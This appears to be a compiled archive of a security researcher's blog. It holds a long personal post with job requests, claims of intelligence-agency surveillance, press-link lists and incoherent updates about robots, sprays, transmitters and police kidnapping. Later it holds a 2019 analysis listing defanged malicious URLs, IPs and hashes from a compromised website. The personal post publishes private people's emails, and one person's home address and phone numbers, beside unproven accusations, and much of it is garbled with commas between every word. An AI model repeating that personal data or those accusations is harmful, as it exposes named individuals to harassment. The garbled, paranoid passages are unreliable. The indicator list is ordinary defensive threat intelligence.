kidnapping and harassment attempts including possible interview requests - feel free to approach me at dan-

cho.danchev@hush.com as I’m currently busy looking for a full time cybercrime researcher security blogger and

threat intelligence analyst type of position.

I would be also definitely looking forward to sharing some of my sensitive projects including related work in

various other sensitive areas with the idea to end the ongoing IP (Intellectual Property) robbery courtesy of a variety

of industry-leading companies and individuals. [2]Has the time come to work hard and set them straight? It appears

so. Feel free to approach me at dancho.danchev@hush.com
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You can use the following PGP key to approach me regarding possible [3]career opportunities regarding possible
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involvement in related sensitive projects at dancho.danchev@hush.com or just to say hi request [4]Threat Data

access including a sample or a possible trial or make a comment regarding my current and [5]historical OSINT

research including possible references to my 2010 disappearance including various cybercrime underground chatter

referencing me and my research including disappearance and possible kidnapping including possible GCHQ Lovely

Horse references and related resources and comments.

Sample Information Security and Information Warfare cartoon circa 2008:

Second Sample Information Security and Information Warfare cartoon circa 2008:

UPDATE: It appears that someone managed to somehow place a basketball ball on my head chin and eye and

therefore I’m currently experiencing a pressure on my eye and my face with people attempting to communicate with

me.

UPDATE: It appears that someone is attempting to communicate with me using pressure pressed on my stom-

ach.
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UPDATE: It appears that someone is pressing a doll on a wall and is attempting to communicate with me in-

cluding an increased pressure in my place.

UPDATE: It appears that different people are attempting to communicate with me behind a wall using a bas-

ketball ball interfering with the pressure in my place.

UPDATE: It appears that the robot has been persistently sprayed with homo-sexual spray including a possible

female spray leading to a persistent harassment and torture currently affecting my life-being work-relationships and

intellectual property.

UPDATE: It appears that someone managed to placed a box on the top of the robot for a period of several

years successfully blinding me and restraining me from remote work activity.

In a related news story regarding my experience and expertise in the field it appears that the GCHQ has been actively

monitoring me on Twitter including active traffic monitoring in a 2012 Intelligence Community program labeled -

[6]Lovely Horse that’s basically a Palantir implementation of [7]OSINT practices regarding a certain Twitter account.

The purpose? Active traffic and [8]content monitoring for the purpose of robbing me out of sensitive research and

related research data which leads me to believe that I’ve been successfully contributing to a massive treasure trove

IP (Intellectual Property) theft and robbery courtesy of the GCHQ and the NSA for a significant period of time.
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- [9]Western Spy Agencies Secretly Rely on Hackers for Intel and Expertise

- [10]LOVELY HORSE: GCHQ Program Monitored Hacker/InfoSec Community on Social Media

- [11]GCHQ’s ’Lovely Horse’ tool helped spooks monitor hackers online

- [12]GCHQ created ’Lovely Horse’ to keep track of top hackers’ and security specialists’ blogs and tweets

- [13]Spy Agencies Rely on Hackers for Stolen Data and Monitoring Security Experts for Expertise

- [14]GCHQ Create Their Own Tweetdeck To Track People of Interest

- [15]GCHQ siphoned off info stolen by hackers for its own ends

- [16]Some hackers are unknowingly gathering intel for the NSA

It’s also becoming increasingly evident that I’m also a participant in several other Intelligence Community Pro-

grams that appear to have successfully attempted to rob and steal my "know-how" leading me to pursue a possible

closed-community data and research sharing or to request invite-only access to related research and data. Re-

member [17]HBGary? It appears that every then and now a security company tries to re-position the industry by

offering targeted and proprietary Threat Intelligence to a variety of sources successfully undermining a variety of

community-offered and presented actionable Threat Intelligence.
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While it’s an honor to receive a competing proposition it should be noted that the majority of my research is

public excluding several community-driven sensitive projects that I spend my time working on. It appears that the

time has come for me to take my research to a whole new level which led me to pursue my own career patch

within the Intelligence Community by successfully launching [18]Disruptive Individuals including the [19]Obmonix -

Cybercrime and Cyber Jihad Fighting Platform including the eventual launch of the invite-only [20]Threat Data - The World’s Most Comprehensive Threat Database including a possible [21]career opportunity with the industry-leading Webroot including a short-term venture with [22]GroupSense including a possible [23]SCMagazine 2011 nomination

for my Twitter activity including the [24]upcoming launch of Astalavista Security Group 2.0 - my primary working location throughout the 90’s with a currently active crowdfunding campaign.

While I continue to be a firm believer that sharing and communicating actionable Threat Intelligence to a variety

of source is the appropriate way to proceed and process a variety of cybercrime-related campaigns and malicious

activity I believe that the time has come for me to take my research to a whole new level prompting me to seek a

new career opportunity as the [25]World’s leading cybercrime researcher security blogger and threat intelligence

analyst.
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The majority of sources referenced in the original research basically represent the majority of [26]my RSS feeds

circa 2006 and it’s becoming increasingly interesting perhaps even funny to figure out that the majority of my

[27]OSINT techniques including active WHOIS monitoring and research are widely accepted and discussed within

the Intelligence Community.
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What prompted the GCHQ to issue an active traffic and Twitter account monitoring campaign? Keep reading - back

in the day throughout the period of 2008-2013 I used to actively monitor and profile various high-profile nation-state

malicious and fraudulent campaigns including the [28]infamous Koobface botnet – listed to the [29]original

MP3 interview – which I extensively [30]profiled and managed to practically take down including the [31]active exposing of its core [32]botnet master including the active exposure of client-side exploits being served through the

[33]Koobface botnet through what appears to be [34]a partnership between the Koobface botnet master and a

well known cybercriminal - Exmanoize a well known author of a well known Web malware exploitation kit including

the receiving of malware-infected host embedded messages in response to my " [35]10 things you didn’t know

about the Koobface gang" including [36]what appears to be a [37]direct redirection of Facebook to my personal blog including yet [38]another message left by the [39]Koobface gang, including a variety of [40]typosquatted C &C

server domains registered to my name [41]including extensive [42]Russian Business Network coverage at the time.

Sample Koobface Botnet Infographic courtesy of CyberCamp 2016:
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It’s also worth mentioning that at the time the [43]U.S Treasury Department was also redirecting to my Blogger

profile [44]including the active HOST file modification courtesy of a well known money-mule recruitment campaign.

Consider going through the following set of resources and news articles throughout 2008-2013 which can best

describe the Threat Intelligence Scene the way I know it and the way I’m positive it should be.

Research and News Articles covering my research and referencing me throughout - 2008:

• [45]Russian hacker ’militia’ mobilizes to attack Georgia

• [46]Fraudsters Target Facebook With Phishing Scam

• [47]Fake Microsoft e-mail contains Trojan virus
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• [48]Hackers expand massive IFRAME attack to prime sites

• [49]Hackers infiltrate Google searches

• [50]Hackers expand massive IFrame attack to prime sites

• [51]Hackers knocked Comcast.net offline

• [52]Adobe investigates Flash Player attacks

• [53]High-tech bank robbers phone it in

• [54]Attackers booby-trap searches at top Web sites

• [55]Carpet bombing networks in cyberspace

• [56]Storm worm e-mail says U.S. attacked Iran

• [57]India’s underground CAPTCHA-breaking economy

• [58]Domain Name Record Altered to Hack Comcast.net

• [59]Google searchers could end up with a new type of bug

• [60]Ongoing IFrame attack proving difficult to kill

• [61]Hackers expand massive IFRAME attack to prime sites

• [62]Danchev: The small pack Web malware exploitation kit

• [63]Danchev: Massive SQL injection the Chinese way

• [64]CAPTCHAs are dead - new research from Dancho Danchev confirms it

• [65]Hackers infiltrate Google searches

• [66]Massive faux-CNN spam blitz uses legit sites to deliver fake Flash

• [67]Faked CNN spam blitz pushes fake Flash

• [68]Danchev: Anti-fraud site DDOS attack

• [69]Sony PlayStation site victim of SQL-injection attack

• [70]Fake CNN Alert Still Spreading Malware

• [71]Look Ma, I’m on CIA.gov

Research and News Articles covering my research and referencing me throughout - 2009:

• [72]Green Dam exploit in the wild

• [73]“In gaz we trust”: a fake Russian energy company facilitating cybercrime

• [74]Don’t pay your ransom via SMS

• [75]NYT scareware scam linked to click fraud botnet
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• [76]Danchev: A crimeware developer’s to-do list

• [77]Danchev rained on my scareware campaign

• [78]Is “aggregate-and-forget” the future of cyber-extortion?

• [79]NYT scareware scam linked to click fraud botnet

• [80]Microsoft declares war on ’scareware’

• [81]Don’t pay your ransom via SMS

• [82]Twitter warms up malware filter

• [83]What’s really the safest Web Browser?

• [84]With Unrest in Iran, Cyber-attacks Begin

• [85]Zeus bot found using Amazon’s EC2 as C &C server

Research and News Articles covering my research and referencing me throughout - 2010:

• [86]Firefox add-on encrypts sessions with Facebook, Twitter

• [87]Watch out for malware with those pretty Mac screensavers

• [88]Months-old Skype vulnerability exploited in the wild

• [89]Danchev: Money mule recruiters

• [90]Cybercrime’s bulletproof hosting exposed

• [91]Malware Threatens to Sue BitTorrent Downloaders

• [92]Firefox add-on encrypts sessions with Facebook, Twitter

• [93]Chuck Norris Botnet Karate-chops Routers Hard

Research and News Articles covering my research and referencing me throughout - 2011:

• [94]Kaspersky disputes McAfee’s Shady Rat report

• [95]Has EV-SSL Growth Been Slow?

• [96]Report: Vishing Attack Targets Skype Users

Research and News Articles covering my research and referencing me throughout - 2012:

• [97]Fake UPS notices deliver malware

• [98]ZeuS/Zbot Trojan Spread Through Rogue US Airways Email

• [99]New Skype malware threat reported: Poison Ivy

• [100]Five Koobface botnet suspects named by New York Times
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• [101]Virtual jihad: How real is the threat?

• [102]Is the death knell sounding for traditional antivirus?

• [103]Can the Nuclear exploit kit dethrone Blackhole?

• [104]Experts split over regulation for bounty-hunting bug sniffers

• [105]Spammers Using Fake YouTube Notifications to Peddle Drugs

• [106]Adele Bests Adderall As Affiliate Spammers Offer Music Downloads

• [107]Bulgarian sleuth unveils botnet operators

• [108]Fake PayPal Emails Distributing Malware

• [109]Web Gang Operating in the Open

• [110]ZeuS/Zbot Trojan Spread Through Rogue US Airways Email

• [111]Buy 500 hacked Twitter accounts for less than a pint

• [112]NBC.com Hacked, Infected With Citadel Trojan

Research and News Articles covering my research and referencing me throughout - 2013:

• [113]How Much Does A Botnet Cost?

• [114]Automated YouTube account generator offered to cyber crooks

• [115]Upgraded Modular Malware Platform Released in Black Market

• [116]Deconstructing the Al-Qassam Cyber Fighters Assault on US Banks

• [117]NBC hack infects visitors in ’drive by’ cyberattack

• [118]Bitcoins are being traded for hack tools

• [119]New DIY Google Dorks Based Hacking Tool Released

• [120]Hacking The TDoS Attack

• [121]Mass website hacking tool alerts to dangers of Google dorks

• [122]Cybercrime service automates creation of fake scanned IDs

• [123]Spammers unleash DIY phone number slurping web tool

• [124]Spam email contains malware, not Apple gift card

• [125]APT1, that scary cyber-Cold War gang: Not even China’s best

• [126]Mass website hacking tool alerts to dangers of Google dorks

• [127]C &C PHP script for staging DDoS attacks sold on underground forums

• [128]Russian Malware-as-a-Service Offers Up Server Rentals for $240 a Pop

• [129]Java exploit kit sells for $40 per day
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• [130]Buggy DIY botnet tool leaks in black market

• [131]New DIY Google Dorks Based Hacking Tool Released

• [132]Botnets for rent, criminal services sold in the underground market

• [133]Spam email contains malware, not Apple gift card

UPDATE: It appears that someone placed a remote robot at local police department capable of recording my life

including my life-being leading to a ruined career work relationships and intellectual property.

UPDATE: It appears that an unknown group of people is attempting to communicate with me using a transmitter on

my mouth using plastic paper in their mouth.

UPDATE: It appears that someone is permanently trying to hide my eyes using plastic paper apparently using

a transmitter that’s been apparently placed on my mouth. It also appears that the person behind the transperant is

attempting to move closely thereby ruining my equipment and life-being.

UPDATE: It appears that the transperant is operated by someone relying on lenses including bottles to map and

touch-point related activities of an individual in place following persistent harassment and life-being manipulation.

In a related news article - " [134]ZDNet Security Blogger Goes Missing in Bulgaria" covering my disappearance I came across to a juicy comment referencing the work of a well-known artist which leads me to research a little bit further

leading me to the following CD/Vinyl label - "Blue Sabbath Black Cheer / Griefer – We Hate You / Dancho Danchev

Suck My Dick" courtesy of the the following individual.
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Take into consideration the following brief post regarding the associated individual:

" It’s 2010 and I’m stumbling upon a defaced image of my head shot (circa 2006). I never actually bothered

about what others say, even when they insist that I’m maliciously enjoying the fact that I profile, expose, and disrupt

cybercrime campaigns when there’s no time for enjoyment, as the stakes are too high.

The defaced headshot is part of the released back in 2010 album "We Hate You/Dancho Danchev S*ck my

D*ck" by the Blue Sabbath Griefer group.
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So who’s behind this "black PR" campaign? Who’s the mysterious Photoshop-er? It’s a [135]Canadian music artist

called [136]Ron Brogden, who spends his spare time coding for hire, when he’s not photoshoping my headshots.

Hatred-friendly domain name reconnaissance:

deterrent.net - 95.142.172.70 - Email: slave@codegrunt.com

Domain owner: Ron Brogden, Secondary emai: moron@industrial.org

Music Label Address: P.O. Box 8021; Victoria, BC, Canada; V8W 3R7

Home address: 647 Speed Avenue, Victoria, British Columbia, V8Z 1A5

Phone: +1.250-360-0372; +1.250-381-0088

Responding to the same IP are also the following domains operated by Ron:

codegrunt.com

deterrent.net

industrial.org

nuckflix.com"
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In terms of my 2010 disappearance I also recently came across to the following [137]screenshots courtesy of the

cybercrime-friendly forum Darkode courtesy of an individual known as Xylitol discussing my disappearance including

a possible Hitman Request charging at $10,000. Unfortunately, the screenshots were taken using the name of Nassef

with whom Xylitol shared his accounting details with me including the taking of the screenshots.
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UPDATE: It appears that my 2010’s disappearance is slowly turning into a modest [138]kidnapping attempt on behalf of Bulgarian law enforcement in constitution with DANS (State Agency for National Security) who appear to have

been operating a long-turn operation to ruin my reputation intellectual property and work relationships successfully

holding me a hostage for a period of seven years following a long-run kidnapping and harassment attempts leading

to a ruined career intellectual property violation and work relationships.

Operating a remotely-operated gas pomp with azbest targeted at my place Bulgarian law enforcement in con-

stitution with DANS (State Agency for National Security) appear to have successfully tracked down and manipulated

my life-being following a successful set of long-run kidnapping and harassment attempts leading to a successfully

ruined career intellectual property violation and work relationships.

It appears that Bulgarian law enforcement in constitution with DANS (State Agency for National Security) have

placed remote stickers on my place and have managed to successfully map my place leading to a successful illegal
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entry courtesy of an unknown person followed by another unknown person supposedly a colleague followed by

an illegal entry courtesy of unknown police officers who took my ID an escorted me to a local institution without

explaining the reason for holding me hostage there.

It appears that the group is operating a transperant using feelings to map and touch point related activities of

the individuals in place following a successful kidnapping and harassment attempt leading to illegal entry and

possible kidnapping attempt. It appears that Bulgarian law enforcement in constitution with DANS (State Agency

for National Security) have managed to place a plastic sticker in my mouth leading to a successful monitoring and

tracking including the use of a transperant leading to a successful kidnapping and harassment attempt leading to a

ruined career intellectual property violation and work relationships.

UPDATE: [139]Great News: Missing Cybersecurity Expert Dancho Danchev Is No Longer Missing, [140]We

need help with the strange disappearance of Dancho Danchev, [141]Security Researcher, Cybercrime Foe Goes

Missing, [142]Dancho Danchev: Missing cybersecurity expert, [143]Cybercrime Blogger Vanishes After Finding

Tracking Device In His Bathroom, [144]Zero Day blogger Dancho Danchev: he’s back, [145]The Strange Disappear-

ance of Dancho Danchev, [146]We need help with the strange disappearance of Dancho Danchev, [147]Mystery

Surrounds Cyber Security Blogger Dancho Danchev’s Whereabouts, [148]Update on Dancho Danchev, [149]ZDNet

Security Blogger Mysteriously Disappears, [150]ZDNet Blogger Disappears Mysteriously In Bulgaria, [151]ZDNet

Blogger Disappears Under Mysterious Circumstances

UPDATE: Prior, to, my, stay, in, another, town, I, was, contacted, by, Riva Richmond, (riva@rivarichmond.com), and, 474



set, up, a, meeting, to, discuss, a, potential, New York Times, article.

UPDATE: Prior, to, my, stay, at, this, particular, apartment, I, contacted, Nart Villeneuve, (n.villeneuve@secdev.ca), seeking, assistance, signaling, potential, trouble.

UPDATE: Prior, to, my, stay, at, a, local, institution (dpblovech@abv.bg), for, a, period, of, three, months, the, same, person, Kamen Kovachev (Kamen Tzura) (tsyrov@abv.bg), was, released, by, another, person, known, as, Nesho

Sheygunov (https://www.facebook.com/nesho.sheyguno v).

UPDATE: While, my, stay, at, a, local, institution (dpblovech@abv.bg), for, a, period, of, three, months, an-

other, person, that, I, know, Kamen Kovachev (Kamen Tzura) (tsyrov@abv.bg), was, taken, to, the, room, where, I,

was, confined, and, I, spent, a, night, in, the, corridor.
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UPDATE: While, I, was, taken, to, a, local, institution (dpblovech@abv.bg), for, a, period, of, three, months, I, had, my, phone, taken, and, I, was, confined.

UPDATE: While, I, was, taken, out, of, my, place, to, an, unknown, car, the, fuel, was, charged, to, someone,

that, I, know.

UPDATE: Prior, to, my, stay, at, a, local, institution (dpblovech@abv.bg), I, was, offered, to, take, vitamins.

UPDATE: My, place, was, recently, visited, by, unknown, men, taking, me, to, local, police, department (hxxp://troyan-police.com; police _troyan@abv.bg), and, asking, me, to, write, that, my, equipment, was, interfering, with, that, of, local, police, department.
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UPDATE: It, appears, that, someone, has, taken, the, time, and, effort, to, take, a, t-shirt, of, mine.

UPDATE: Prior, to, my, visit, at, a, local, hotel, (hxxp://central-hotel.com/en; central@central-hotel.com), some, of, my, clothes, were, missing.

UPDATE:

It,

appears,

that,

my,

place,

was,

recently,

supposedly,

visited,

by,

Pla-

men,

Dakov

(hxxp://universalstroi.com),

Hristo,

Radionov

(hxxp://universalstroi.com;
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hxxp://www.facebook.com/hristo.radionov), and, Ivailo, Dochkov (hxxp://www.facebook.com/ivodivo), who,

left, money, for, me.

UPDATE: Prior,

to,

my,

attendance,

in,

a,

local,

institution (dpblovech@abv.bg),

Ivailo,

Dochkov

(hxxp://www.facebook.com/ivodivo), tried, to, meet, me.

UPDATE: Prior, to, my, attendance, at, this, particular, apartment, I, was, invited, by, Briana Papa (Bri-

ana@crenshawcomm.com), to, visit, Prague, on, behalf, of, Avast! Software, where, I, met, with, Vince Steckler

(steckler@avast.com), and, Miloslav, Korenko (korenko@avast.com), where, I, met, with, Lucian Constantin

(hxxp://twitter.com/lconstantin).

Prior, to, my, attendance, at, this, apartment, I, was, also, invited, to, another, event, held, at, INTERPOL, by, Steve

Santorelli

(steve.santorelli@gmail.com), which, I, successfully, attended, and, presented, at, where, I, also, met, with, Krassimir Tzvetanov (krassi@krassi.biz).

Something, else, worth, pointing, out, is, that, my, place, is, visited, by, an, unknown, woman,

known,

as,

Boriana Mihovska,

an,

unknown,

man,

known,

as,

Leonid,

an,

unknown,

person,

known,

as,

Tzvetan

Georgiev

(hxxp://www.youtube.com/user/laron640;

tzvetan.leonid@gmail.com);

(hxxp://plus.google.com/107108766077365473231), and, an, unknown, person, known, as, Dobrin Danchev

(hxxp://www.facebook.com/dobrin.danchev); (hxxp://www.sibir.bg/parachut), and, another, unknown, person,

known, as, Ina, Dancheva (http://otkrovenia.com/bg/profile/innadancheva).

The, most, recent, visit, to, my, place, was, by, a, person, known, as, Vasil, Stanev, from DANS (dans@dans.bg), who,

was, supposedly, asking, me, to, take, a, job, and, consequently, asked, me, to, attend, a, doctor, session.

Dear, blog, readers, I, feel, it’s, about, time, I, post, an, honest, response, regarding, my, [152]disappearance, in,

[153]2010, with, the, [154]purpose, of, [155]information, my, [156]readers, on, my, [157]current, situation, and,
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[158]to, continue, [159]posting, and, contributing, valuable, threat, intelligence, to, the, security, community.

In, 2010, I, moved, to, an, apartment, located, in, another, town, and, apparently, my, apartment, have, been,

vandalized, including, persistent, harassment, by, my, neighbors, including, a, possible, illegal, entry, courtesy, of,

the, person, responsible, for, hiring, the, apartment (Kalin Petrov; kalin _petrov@hotmail.com).

After, a, persistent, chase, down, and, harassment, courtesy, of, the, person, responsible, for, hiring, the, apartment,

I, received, a, notice, to, leave, and, had, my, apartment, visited, by, the, person, responsible, for, hiring, including,

another, man, including, another, man, that, was, supposedly, supposed, to, take, care, of, my, belongings.

Prior, to, my, accommodation, I, was, contacted, by, Pauline, Roberts (pauline.roberts@ic.fbi.gov), who, recom-

mended, me, to, Yavor, Kolev (javor.kolev@gmail.com), and, Albena, Spasova (albaadvisors@gmail.com), from,

Bulgarian, local, authorities, followed, by, a, series, of, communication.

Prior, to, returning, to, my, place, in, 2011, my, house, was, vandalized, by, three, police, officers (hxxp://troyan-

police.com; police _troyan@abv.bg), from, the, local, police, department, who, entered, my, house, in, particular, my, bedroom, and, unpolitely, asked, my, to, dress, while, showing, me, a, copy, of, my, personal, ID, that, I, haven’t,

presented, and, taking, me, to, an, unknown, car, without, explaining, the, reason, for, taking, me.
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Sample Email communication between me, Pauline Roberts, Javor Kolev and Albena Spasova circa 2010:

Original message sent by Pauline Roberts - 2010

Second email received from Pauline Roberts - 2010
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Original message received by Albena Spasova - 2010

Original response issued to Pauline Roberts, Javor Kolev, and Albena Spasova - 2010
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Original response issued to Pauline Roberts, Javor Kolev, and Albena Spasova - 2010 - Part Two

Original message received by Albena Spasova - 2010
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Original response issued by Javor Kolev - 2010

Original response issued to Javor Kolev - 2010

Original response issued by Javor Kolev - 2010 - Part Two

Original response issued to Javor Kolev - 2010 - Part Two
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Original response issued by Javor Kolev - 2010 - Part Three

Original response issued to Javor Kolev - 2010

Original response issued by Javor Kolev - 2010 - Part Four
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Original response issued to Javor Kolev - 2010

Original response issued by Javor Kolev - 2010 - Part Five
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Original response issued to Javor Kolev - 2010

Original response issued by Javor Kolev - 2010 - Part Six
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A, few, hours, later, I, find, myself, located, in, an, institution (dpblovech@abv.bg), for, a, period, of, three, months, without, anyone, explaining, the, reason, for, holding, me, there.

Upon, entering, I, had, my, phone, taken, without, having, received, any, sort, of, explanation, for, taking, me,

and, holding, me, there.

UPDATE: My most recent visit to local police department was to announce a possible food-poisoning and I

was told not to live in my place.

Given, this, circumstances, I, feel, that, it, has, become, highly, unproductive, to, continue, my, work, and,

therefore, I’m, currently, seeking, a, permanent, relocation, including, a, possible, full, time, career, opportunity, in,

the, field, of, cybercrime, research, security, blogger, or, threat, intelligence, analyst.
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In case you’re aware of someone looking to hire full-time threat intelligence analyst cybercrime researcher or a

security blogger feel free to approach me at dancho.danchev@hush.com
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Introducing Unit-123.org - Cyber Threat Intelligence Portal (2019-04-12 21:41)

Dear blog readers, I wanted to take the time and effort and introduce you to my latest project called [1]Unit-123.org

where you can find quality research articles in a variety of topics that I will be publishing on a daily basis with the

idea to bring back the spirit of my editorial years and to continue spreading quality data information and knowledge

to a loyal base of users and readers.

Feel free to reach me at dancho.danchev@hush.com

Stay tuned!

1. http://unit-123.org/
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Flashpoint Intel Official Web Site Serving Malware - An Analysis (2019-04-22 08:32)

UPDATE: Flashpoint Intel issued a [1]response to my research.

UPDATE: [2]SCMagazine picked up the story.

UPDATE: [3]Anti-Malware.name picked up the story.

UPDATE: [4]EnterpriseTimes picked up the story

UPDATE: [5]Rambler News picked up the story.

It appears that [6]Flashpoint’s official Web site is currently embedded with malware-serving malicious script

potentially exposing its visitors to a multi-tude of malicious software.

Original malicious URL hosting location:

hxxp://www.flashpoint-intel.com/404javascript.js

hxxp://www.flashpoint-intel.com/404testpage4525d2fdc

Related malicious URL redirection chain:

hxxp://www.flashpoint-intel.com

->

hxxp://destinywall.org/redirect?type=555

-

;

hxxp://ermoyen.tk/index/?4831537102803

->

hxxp://search.plutonium.icu/?utm

_medium=7710edb9b

->

hxxp://search.plutonium.icu/?utm _term=66793697539 -> hxxp://search.plutonium.icu/proc.php?37ba8df02c6d

-> hxxp://onwardinated.com/c/5a37c8ad-f104-11e5-9f1f -> hxxp://circultural.com/v/c3937168-5def-11e9-b07a -> hxxp://3daa61.circultural.com/l/8c579bd6-2433-11e
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Second sample URL redirection chain:

hxxp://www.flashpoint-intel.com/

->

hxxp://destinywall.org/redirect?type=555

&

->

hxxp://ermoyen.tk/index/?4831537102803

->

hxxp://search.plutonium.icu/?utm

_medium=7710edb9b

->

hxxp://search.plutonium.icu/?utm _term=66793698655 -> hxxp://search.plutonium.icu/proc.php?123dd67462ec -> hxxp://onwardinated.com/c/5a37c8ad-f104-11e5-9f1f -> hxxp://circultural.com/v/d45c2e40-5def-11e9-bd47

Related legitimate URL known to have participated in the campaign:

hxxp://boards.greenhouse.io/flashpoint/jobs/4125871002?gh _jid=4125871002

Related malicious URL redirection chain:

hxxp://unanimous.live/ - 104.28.24.233- hxxp://jsc.adskeeper.co.uk/a/d/adw.toolbar.com.333699.js

hxxp://destinywall.org/redirect?type=555 & - 176.123.9.53 -> hxxp://ermoyen.tk/index/?4831537102803 -

37.230.116.105

Related malicious URLs known to have participated in the campaign:

hxxp://oussercondition.tk/index/?4831537102803

hxxp://testify.newsfeed.support/esuznxifqk?c=15 &amp

hxxp://impress.newsfeed.support/esuznxifqk?c=20 &amp

hxxp://minently.com/RnSda/rDN3/ojdn/-nsy7qV12UzKdEclLfy6SOfF-12z43GPMrEyUTBKdtG

lCYlxwB8e?qDo=MS
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_WW _AGG _Desktop &subid=6679367743860375570 &ext1=1608

hxxp://minently.com/RnSda/rDN3/uSJk/-nsy7qV12UzKdEclLfy6SOfF-12z43GPMrEyUTBKd

tGlCYlxwB8e/

_jVh7fd2lUHCfkQjLfPyHo _ZayrHiuU?ori=6x &ex=6 &pbi=5cb1e1a50b08e2.738349245

hxxp://minently.com/RnSda/rDN3/uSJk/-nsy7qV12UzKdEclLfy6SOfF-12z43GPMrEyUTBKd

tGlCYlxwB8e/

_jVh7fd2lRfKJxF0KvzyETF1t74kzXE?ori=6x &ex=6 &pbi=5cb1e1ac8e8cd8.865930185 - 205.147.93.131

hxxp://search.plutonium.icu/?utm _term=6679367743860375570 &clickverify=1 &utm _content=fdc2c69a9 -

99.198.108.198

hxxp://minently.com/RnSda/rDN3/uSJk/-nsy7qV12UzKdEclLfy6SOfF-12z43GPMrEyUTBKd

tGlCYlxwB8e/

_jVh7fd1kUSXfhYjK _7yHXZI1b-Xzt8?ori=6x &ex=6 &pbi=5cb1e2e0ebe9a2.271109695 - 205.147.93.131

hxxp://click.monetizer-return.com/?utm _medium=f0b5c66dbbca0c7df1803313f76c9a781d4f8

e57 - 198.143.165.221

hxxp://play.superlzpre.com/red/?code=RY6GVO6HT5VM &a=6679370333725656167 &pubid=1608 - 217.13.124.95

Related malicious domains known to have participated in the campaign:

hxxp://destinywall.org - 176.123.9.53

hxxp://hellofromhony.org

hxxp://hellofromhony.com

hxxp://thebiggestfavoritemake.com

hxxp://destinywall.org

hxxp://verybeatifulpear.com

hxxp://strangefullthiggngs.com

hxxp://stopenumarationsz.com

Related malicious and fraudulent IPs known to have participated in the campaign:

hxxp://onwardinated.com - 52.85.88.105; 52.85.88.202; 52.85.88.224; 52.85.88.151; 52.85.58.244; 52.85.58.217 ;

52.85.58.236 ; 52.85.58.52

hxxp://205.147.93.131

hxxp://99.198.108.198

hxxp://217.13.124.95

hxxp://143.204.247.69

hxxp://143.204.214.90
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Related malicious MD5s known to have participated in the campaign:

MD5: b28e98bb6ed0e0af8ec7a2d47ca6b053

MD5: f0dfab9f9a1a7e5dc8c00222292e401e

MD5: 6b986d4bc5475af102bfff4d28a5cf50

MD5: e963ed9b5c052d02c972e449142f7946

MD5: 7dee4f221d3b3779301f4b38061d6992

Related malicious MD5s known to have participated in the campaign:

MD5: 30f6d6bd507317dbcf1708edc449c970

MD5: 437cfb417c5a6e7fc3d446dcd35203fc

MD5: e1fd735fdf97cc734ec46d2b33aac8bf

MD5: b37b7d221526faa8ffbea52626e5ac87

MD5: 821a00b057a9fabe670174eab4b28e77

Related malicious MD5s known to have participated in the campaign:

MD5: 0bb4e038ce1fecb88be583d776cfa4a0

MD5: 7197f433b0d269848ae1d1e957a9b858

MD5: 1d72d5255bd2450fb04a7a2c68ff87bd

MD5: b3722ade8c3ee908b6f82ae81ae2d748

MD5: 89ddddb5b3a88ef3d6da57c72197e0cc

MD5: 6a490bbd341db8033ec86fc771f24926

MD5: b52d0377b2f741dd20e17dfad3ca58aa

MD5: 813e84f9bd30eed6390f5ce806916f2a

MD5: 81810b6e4c89c03260a6bac4a16ef3ba

MD5: c9cb7f2ea5b8a16f4fb4246825e8a3de

Related malicious and fraudulent URLs known to have participated in the campaign:

hxxp://notifymepush.info

hxxp://101newssubspush.info

hxxp://Bestofnewssubspush.info

hxxp://Burningpush.info

hxxp://Checkadvisefriends.info

hxxp://Checksayfriends.info
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hxxp://Checksuefriends.info

hxxp://Conewssubspush.info

hxxp://Enewssubspush.info

hxxp://Examinenotifyfriends.]info

hxxp://Gonewssubspush.info

hxxp://Hitnewssubspush.info

hxxp://Inewssubspush.info

hxxp://Inspectnotifyfriends.info

hxxp://Justnewssubspush.info

hxxp://Livenewssubspush.info

hxxp://Metanewssubspush.info

hxxp://Newnewssubspush.info

hxxp://Notifymepush.info

hxxp://Nunewssubspush.info

hxxp://Pushmeandtouchme.info

hxxp://Scannotifyfriends.info

hxxp://Searchnotifyfriends.info

hxxp://Testnotifyfriends.info

hxxp://Thentouchme.info

hxxp://Topnewssubspush.info

hxxp://Touchthenpush.info

hxxp://Trynewssubspush.info

hxxp://Upnewssubspush.info

hxxp://Usenotifyfriends.info

hxxp://Wenewssubspush.info

Related malicious and fraudulent domains known to have responded to 109.234.39.160:

hxxp://ivreprsident.tk

hxxp://uvrirordre.tk

hxxp://offriractivit.tk

hxxp://ermoyen.tk

hxxp://iterrisque.tk

hxxp://derchef.tk

hxxp://echance.tk

hxxp://terminerespace.tk

hxxp://rofiterami.tk

hxxp://evenirweb.tk

hxxp://nviterinformation.tk

hxxp://xemple.tk

hxxp://isercarte.tk

hxxp://airelaisserquestion.tk

hxxp://derimage.tk

hxxp://alsoutenirdomaine.tk

hxxp://arderplan.tk

hxxp://rsentermonde.tk

hxxp://marquerexprience.tk

hxxp://germatire.tk

hxxp://rerlivre.tk

hxxp://ngersource.tk

hxxp://voyercasino.tk
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hxxp://onctionnerfrance.tk

hxxp://raliserpage.tk

hxxp://nterespace.tk

hxxp://ectuerpartie.tk

hxxp://erguerre.tk

hxxp://nnatrevaleur.tk

hxxp://fierargent.tk

hxxp://irmertravers.tk

hxxp://dcidertemps.tk

hxxp://irebase.tk

hxxp://inerpied.tk

hxxp://limiterprsident.tk

hxxp://resteraffaire.tk

hxxp://laisserloi.tk

hxxp://treterre.tk

hxxp://iresuite.tk

hxxp://tenirair.tk

hxxp://rganiserargent.tk

hxxp://nelchoisirhistoire.tk

hxxp://grertte.tk

hxxp://oncernerpriode.tk

hxxp://ncerchoix.tk

hxxp://mpagnercas.tk

hxxp://permesure.tk

hxxp://urirproduit.tk

hxxp://relieu.tk

hxxp://sderplan.tk

hxxp://prparerchance.tk

hxxp://hergestion.tk

hxxp://disposerpouvoir.tk

hxxp://isirtat.tk

hxxp://dercoup.tk

hxxp://frersource.tk

hxxp://suivreobjet.tk

hxxp://itteranne.tk

hxxp://anisertude.tk

hxxp://pparatrecouleur.tk

hxxp://trouverplaisir.tk

hxxp://sterenfant.tk

hxxp://ttervente.tk

hxxp://ntirgestion.tk

hxxp://rouverdveloppement.tk

hxxp://nnelfalloirchoix.tk

hxxp://merdemande.tk

hxxp://nnellireapplication.tk

hxxp://ercoup.tk

hxxp://tgrertte.tk

hxxp://moyen.tk

hxxp://duirecorps.tk

hxxp://rerespecterministre.tk
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hxxp://mposerconseil.tk

hxxp://nnatrevaleur.tk

hxxp://choisirfemme.tk

hxxp://nsidreran.tk

hxxp://rderdomaine.tk

